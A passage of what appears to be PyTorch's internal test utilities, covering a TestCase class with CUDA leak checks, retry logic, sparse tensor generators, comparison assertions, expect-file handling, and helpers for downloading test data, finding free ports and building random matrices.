torch.set_warn_always(old_val)
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
# checker to early terminate test suite if unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
# CUDA device side error will cause subsequence test cases to fail.
# stop entire test suite if catches RuntimeError during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
except RuntimeError as rte:
print("TEST SUITE EARLY TERMINATION due to torch.cuda.synchronize() failure", file=sys.stderr)
return True
return False
else:
return False
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
@property
def rel_tol(self) -> float:
return self._rel_tol
@rel_tol.setter
def rel_tol(self, prec: float) -> None:
self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
def wrap_method_with_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
# Recursive function that incorporates retry logic when PYTORCH_RETRY_TEST_CASES=1 and enables early test
# termination. [DISCLAIMER: ONLY WORKS WITH UNITTEST]
# When report_only is True, flaky tests are only reported, but the signal remains the same (the test will still
# show up red).
# Otherwise, the flaky test will show up green while its stats are captured by test reports.
def _run_with_retry(self, result=None, num_runs_left=0, report_only=True):
if num_runs_left == 0:
return
using_unittest = isinstance(result, unittest.TestResult)
if using_unittest:
failures_before = 0 if result is None else len(result.failures) # num tests marked as failed before starting
errors_before = 0 if result is None else len(result.errors) # num tests marked as errored before starting
super().run(result=result)
# Early terminate test if necessary.
if self._should_stop_test_suite():
if result.wasSuccessful():
case = TestCase()
if TEST_SAVE_XML is not None:
# This is a big hacky, XMLRunner modifies expected type from TestCase to TestInfo
# Create dummy TestInfo to record results correctly
from xmlrunner.result import _TestInfo # type: ignore[import]
case = _TestInfo(result, case)
case.output = _TestInfo.ERROR
case.elapsed_time = 0.0
case.test_description = "TestSuiteEarlyFailure"
# This shouldn't really happen, but if does add fake failure
# For more details see https://github.com/pytorch/pytorch/issues/71973
result.failures.append((case, "TestSuite execution was aborted early"))
assert result.wasSuccessful() is False
result.stop()
if not RETRY_TEST_CASES or not using_unittest:
return
err = sys.exc_info()
num_retries_left = num_runs_left - 1
if failures_before < len(result.failures):
print(f" {self._testMethodName} failed - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.failures.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif errors_before < len(result.errors):
print(f" {self._testMethodName} errored - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.errors.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif report_only and num_retries_left < MAX_NUM_RETRIES:
print(f" {self._testMethodName} succeeded - num_retries_left: {num_retries_left}")
result.addUnexpectedSuccess(self)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
def run(self, result=None):
with contextlib.ExitStack() as stack:
if TEST_WITH_CROSSREF:
stack.enter_context(torch.overrides.push_torch_function_mode(CrossRefMode))
num_runs = MAX_NUM_RETRIES + 1 if RETRY_TEST_CASES else 1
self._run_with_retry(result=result, num_runs_left=num_runs, report_only=not OVERRIDE_FLAKY_SIGNAL)
def setUp(self):
check_if_enable(self)
set_rng_seed(SEED)
@staticmethod
def _make_crow_indices(n_rows, n_cols, nnz,
*, device, dtype, random=True):
"""Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
the number of specified elements nnz.
If random is True, the column counts of rows are in random
order. Otherwise, the column counts of rows are defined by the
used sampling method.
Sampling method
---------------
The used sampling method was introduced in
https://pearu.github.io/csr_sampling.html, and here we give
only an overall description of the method.
Notice that crow_indices can be defined as cumsum(counts)
where counts is a sequence of non-negative integers satisfying
the following conditions:
len(counts) == n_rows + 1
counts.max() <= n_cols
while counts[i + 1] is interpreted as the number of specified
elements in the i-th row.
The used sampling method aims at increasing the diversity of
CSR samples, that is, a CSR sample should contain (i) rows
that are all filled, (ii) rows with no elements at all, and
(iii) rows that are partially filled. At the same time and for
the given total number of specified elements (nnz), there
should be minimal preference to rows with a given number of
elements. To achieve this, the sampling method is built-up on
using a sawteeth model for counts. In the simplest case, we
would have
counts = arange(n_rows + 1) % (n_cols + 1)
that has equal number of all possible column counts per row.
This formula can be used only for specific input values of
n_rows, n_cols, and nnz. To generalize this model to any
combinations of inputs, the counts model above is extended
with an incomplete sawtooth, and the right and lower
rectangular parts that will guarantee that
counts.sum() == nnz
for any combination of n_rows, n_cols, and nnz. Basically,
we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
that is able to hold a sequence of sawteeth and so-called
final correction, while the external part of the window is
filled with counts to meet the nnz contraint exactly.
"""
assert 0 <= nnz <= n_rows * n_cols
def sawteeth(n, m):
# return the total number of counts in the sequence of
# sawteeth where n and m define a window in (n_rows+1,
# n_cols+1) rectangle where the sequence of sawteeth
# perfectly fit.
M = (n_cols - m) * (n_cols - m + 1) // 2
K = (n_rows - n) % (n_cols - m + 1)
return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
# Different from the original method description, here counts
# has leading 0 required by crow_indices:
counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
n = m = 0
N = sawteeth(n, m)
if N and nnz >= max(N, n_cols):
# determine the width of the sawteeth window. We use bisection to solve
# N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
# for n
n_left = n
n_right = n_rows - 1
N_right = sawteeth(n_right, m)
while n_right - n_left > 1:
n_middle = (n_left + n_right) // 2
N_middle = sawteeth(n_middle, m)
if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
n_right, N_right = n_middle, N_middle
else:
n_left = n_middle
n, N = n_right, N_right
# fill the right rectangle with counts:
assert n
counts[-n:].fill_(n_cols)
if N and nnz - n * n_cols >= max(N, n_rows - n):
# determine the height of the sawteeth window. We use bisection to solve
# N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
# for m.
m_left = m
m_right = n_cols - 1
N_right = sawteeth(n, m_right)
while m_right - m_left > 1:
m_middle = (m_left + m_right) // 2
N_middle = sawteeth(n, m_middle)
if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
m_right, N_right = m_middle, N_middle
else:
m_left = m_middle
m, N = m_right, N_right
# fill the bottom rectangle with counts:
assert m
counts[1:n_rows - n + 1].fill_(m)
if N:
# fill the sawteeth window with counts
q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
(n_cols - m) * (n_cols - m + 1) // 2)
p = 1 + q * (n_cols - m + 1)
if sys.version_info >= (3, 8):
k = math.isqrt(2 * r)
else:
# math.isqrt(x) is available starting from Python 3.8.
# Here we use int(math.sqrt(x)) as an approximation
# that appers to give exaxt result for all x values
# less than 2**35, at least, the upper limit of x is
# TBD.
k = int(math.sqrt(2 * r))
if k * (k + 1) > 2 * r:
k -= 1
corr = r - k * (k + 1) // 2
assert not ((p > 1) and (m > 0)) # full sawteeth are never on top of a bottom rectangle
# sequence of full sawteeth:
counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
# incomplete sawtooth:
counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
else:
# given input does not support sawteeth
p = 1
corr = nnz - n * n_cols - m * (n_rows - n)
# correction that will guarantee counts.sum() == nnz:
counts[p] += corr
if random:
# randomize crow_indices by shuffling the sawteeth
# sequence:
perm = torch.randperm(n_rows, device=counts.device)
counts[1:] = counts[1:][perm]
# compute crow_indices:
crow_indices = counts
crow_indices.cumsum_(dim=0)
return crow_indices.to(device=device)
def genSparseCompressedTensor(self, size, nnz, *, layout, device, dtype, index_dtype, block_size=()):
from operator import mul
from functools import reduce
sparse_dim = 2
assert all(size[d] > 0 for d in range(len(size))) or nnz == 0, 'invalid arguments'
assert len(size) >= sparse_dim
if block_size:
assert len(block_size) == 2
def random_sparse_compressed(n_compressed_dims, n_plain_dims, nnz):
compressed_indices = self._make_crow_indices(n_compressed_dims, n_plain_dims, nnz, device=device, dtype=index_dtype)
plain_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_compressed_dims):
count = compressed_indices[i + 1] - compressed_indices[i]
plain_indices[compressed_indices[i]:compressed_indices[i + 1]], _ = torch.sort(
torch.randperm(n_plain_dims, dtype=index_dtype, device=device)[:count])
low = -1 if dtype != torch.uint8 else 0
high = 1 if dtype != torch.uint8 else 2
values = make_tensor((nnz,) + block_size, device=device, dtype=dtype, low=low, high=high)
return values, compressed_indices, plain_indices
batch_shape = size[:-2]
n_batch = reduce(mul, batch_shape, 1)
if layout in {torch.sparse_csr, torch.sparse_bsr}:
n_compressed_dims, n_plain_dims = size[-2], size[-1]
else:
n_compressed_dims, n_plain_dims = size[-1], size[-2]
sparse_tensors = [random_sparse_compressed(n_compressed_dims, n_plain_dims, nnz) for _ in range(n_batch)]
sparse_tensors_it = map(list, zip(*sparse_tensors))
values = torch.stack(next(sparse_tensors_it)).reshape(*batch_shape, -1)
compressed_indices = torch.stack(next(sparse_tensors_it)).reshape(*batch_shape, -1)
plain_indices = torch.stack(next(sparse_tensors_it)).reshape(*batch_shape, -1)
return torch.sparse_compressed_tensor(compressed_indices, plain_indices,
values, size=size, dtype=dtype, layout=layout, device=device)
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
return self.genSparseCompressedTensor(size, nnz, layout=torch.sparse_csr, device=device,
dtype=dtype, index_dtype=index_dtype, block_size=())
def genSparseCSCTensor(self, size, nnz, *, device, dtype, index_dtype):
return self.genSparseCompressedTensor(size, nnz, layout=torch.sparse_csc, device=device,
dtype=dtype, index_dtype=index_dtype, block_size=())
def genSparseBSRTensor(self, size, block_size, nnz, *, device, dtype, index_dtype):
assert len(block_size) == 2
return self.genSparseCompressedTensor(size, nnz, layout=torch.sparse_bsr, device=device,
dtype=dtype, index_dtype=index_dtype, block_size=block_size)
def genSparseBSCTensor(self, size, block_size, nnz, *, device, dtype, index_dtype):
assert len(block_size) == 2
return self.genSparseCompressedTensor(size, nnz, layout=torch.sparse_bsc, device=device,
dtype=dtype, index_dtype=index_dtype, block_size=block_size)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
# coalesce is only implemented for COO
if t.layout == torch.sparse_coo:
t = t.coalesce()
return t.to_dense()
# Compares a torch function with a reference function for a given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
numpy_sample = sample_input.numpy()
n_inp, n_args, n_kwargs = numpy_sample.input, numpy_sample.args, numpy_sample.kwargs
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False, **kwargs)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def assertEqual(
self,
x,
y,
msg: Optional[str] = None,
*,
atol: Optional[float] = None,
rtol: Optional[float] = None,
equal_nan=True,
exact_dtype=True,
# TODO: default this to True
exact_device=False,
exact_layout=False,
exact_stride=False,
exact_is_coalesced=False
):
# Hide this function from `pytest`'s traceback
__tracebackhide__ = True
# numpy's dtypes are a superset of what PyTorch supports. In case we encounter an unsupported dtype, we fall
# back to an elementwise comparison. Note that this has to happen here and not for example in
# `TensorOrArrayPair`, since at that stage we can no longer split the array into its elements and perform
# multiple comparisons.
if any(
isinstance(input, np.ndarray) and not has_corresponding_torch_dtype(input.dtype) for input in (x, y)
):
def to_list(input):
return input.tolist() if isinstance(input, (torch.Tensor, np.ndarray)) else list(input)
x = to_list(x)
y = to_list(y)
# When comparing a sequence of numbers to a tensor, we need to convert the sequence to a tensor here.
# Otherwise, the pair origination of `assert_equal` will fail, because the sequence is recognized as container
# that should be checked elementwise while the tensor is not.
elif isinstance(x, torch.Tensor) and isinstance(y, Sequence):
y = torch.as_tensor(y, dtype=x.dtype, device=x.device)
elif isinstance(x, Sequence) and isinstance(y, torch.Tensor):
x = torch.as_tensor(x, dtype=y.dtype, device=y.device)
assert_equal(
x,
y,
pair_types=(
NonePair,
RelaxedBooleanPair,
RelaxedNumberPair,
TensorOrArrayPair,
StringPair,
SetPair,
TypePair,
ObjectPair,
),
sequence_types=(
Sequence,
torch.storage._TypedStorage,
Sequential,
ModuleList,
ParameterList,
ScriptList,
torch.utils.data.dataset.Subset,
),
mapping_types=(Mapping, ModuleDict, ParameterDict, ScriptDict),
rtol=rtol,
rtol_override=self.rel_tol,
atol=atol,
atol_override=self.precision,
equal_nan=equal_nan,
check_device=exact_device,
check_dtype=exact_dtype,
check_layout=exact_layout,
check_stride=exact_stride,
check_is_coalesced=exact_is_coalesced,
msg=msg,
)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *, # type: ignore[override]
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used simulate deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaises(self, expected_exception, *args, **kwargs):
if self._ignore_not_implemented_error:
context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
AssertRaisesContextIgnoreNotImplementedError(expected_exception, self) # type: ignore[call-arg]
try:
return context.handle('assertRaises', args, kwargs) # type: ignore[union-attr]
finally:
# see https://bugs.python.org/issue23890
context = None
else:
return super().assertRaises(expected_exception, *args, **kwargs)
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
# Verifies that an exception with the type expected_exception and message
# matching the regular expression defined by expected_regex is thrown.
# If the test is instantiated for a non-native device type (like XLA)
# then the message is not validated.
# Checks whether the test is instantiated for a device type by testing
# if the test class has defined the device_type attribute and,
# if so, tests whether the instantiated device type is native or not
if hasattr(self, 'device_type') and self.device_type not in NATIVE_DEVICES: # type: ignore[attr-defined]
# empty string matches any string
expected_regex = ''
if self._ignore_not_implemented_error:
context = AssertRaisesContextIgnoreNotImplementedError( # type: ignore[call-arg]
expected_exception, self, expected_regex)
return context.handle('assertRaisesRegex', args, kwargs) # type: ignore[attr-defined]
else:
return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def assertWarnsOnceRegex(self, category, regex=''):
"""Context manager for code that *must always* warn
This filters expected warnings from the test and fails if
the expected warning is not caught. It uses set_warn_always() to force
TORCH_WARN_ONCE to behave like TORCH_WARN
"""
pattern = re.compile(regex)
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
yield
if len(ws) == 0:
self.fail('no warning caught')
self.assertTrue(any([type(w.message) is category for w in ws]))
self.assertTrue(
any([re.match(pattern, str(w.message)) for w in ws]),
f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
# Adjust for producer_version, leave s unmodified
s_tag = re.sub(r'(producer_version): "[0-9.]*"',
r'\1: "CURRENT_VERSION"', s)
f.write(s_tag)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "CURRENT_VERSION"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
def assertAtenOp(self, onnx_model, operator, overload_name=""):
all_aten_nodes = [p for p in onnx_model.graph.node
if p.op_type == "ATen" and p.domain == "org.pytorch.aten"]
self.assertTrue(all_aten_nodes)
for op in all_aten_nodes:
attrs = {attr.name: attr.s.decode() for attr in op.attribute}
if attrs.get("operator") == operator:
break
self.assertEqual(attrs["operator"], operator)
self.assertEqual(attrs.get("overload_name", ""), overload_name)
# run code in subprocess and capture exceptions.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError as e:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg) from e
def find_free_port():
"""
Finds an available port and returns that port number.
NOTE: If this function is being used to allocate a port to Store (or
indirectly via init_process_group or init_rpc), it should be used
in conjuction with the `retry_on_connect_failures` decorator as there is a potential
race condition where the allocated port may become unavailable before it can be used
"""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
return port
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE)):
"""Reruns a test if the test returns a RuntimeError and the exception
contains one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
n_retries = 10
tries_remaining = n_retries
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if any(connect_error in str(error) for connect_error in connect_errors):
tries_remaining -= 1
if tries_remaining == 0:
raise RuntimeError(f"Failing after {n_retries} retries with error: {str(error)}")
time.sleep(random.random())
continue
raise
return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
# FIXME: modernize these to be consistent with make_tensor
# and review including them in torch.testing
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, vh = torch.linalg.svd(A, full_matrices=False)
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return (u * s.to(dtype).unsqueeze(-2)) @ vh
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
"""
Returns a random rectangular matrix (batch of matrices)
with singular values sampled from a Gaussian with
mean `mean` and standard deviation `sigma`.
The smaller the `sigma`, the better conditioned
the output matrix is.
"""
primitive_dtype = {
torch.float: torch.float,
torch.double: torch.double,
torch.cfloat: torch.float,
torch.cdouble: torch.double
}
x = torch.rand(shape, dtype=dtype, device=device)
m = x.size(-2)
n = x.size(-1)
u, _, vh = torch.linalg.svd(x, full_matrices=False)
s = (torch.randn(*(shape[:-2] + (min(m, n),)), dtype=primitive_dtype[dtype], device=device) * sigma + mean) \
.sort(-1, descending=True).values.to(dtype)
return (u * s.unsqueeze(-2)) @ vh
# Returns a noncontiguous (tensor with the same shape and values as t
# The noncontiguous tensor is constructed such that elements in the innermost
# dimension are separated by zeros or (whenever possible) nans
# TODO: consider more complicated noncontiguity schemes
def noncontiguous_like(t):
# Short-circuits if t is already noncontiguous
if not t.is_contiguous():
return t
# Special-cases 0-dim tensors
zero_dim = t.ndim == 0
if zero_dim:
t = t.unsqueeze(0)
result = torch.repeat_interleave(t.detach(), 2, dim=-1)
# Choose a "weird" value that won't be accessed
if t.dtype.is_floating_point or t.dtype.is_complex:
value = math.nan
elif t.dtype == torch.bool:
value = True
else:
value = 12
if zero_dim:
result[0] = value
result.set_(result.storage(), 1, (), ())
else:
result[..., 1::2] = value
strides = list(result.stride())
strides[-1] *= 2
result.set_(result.storage(), result.storage_offset(), t.size(), stride=tuple(strides))
result.requires_grad_(t.requires_grad)
return result
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mT).div_(2)
return A
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
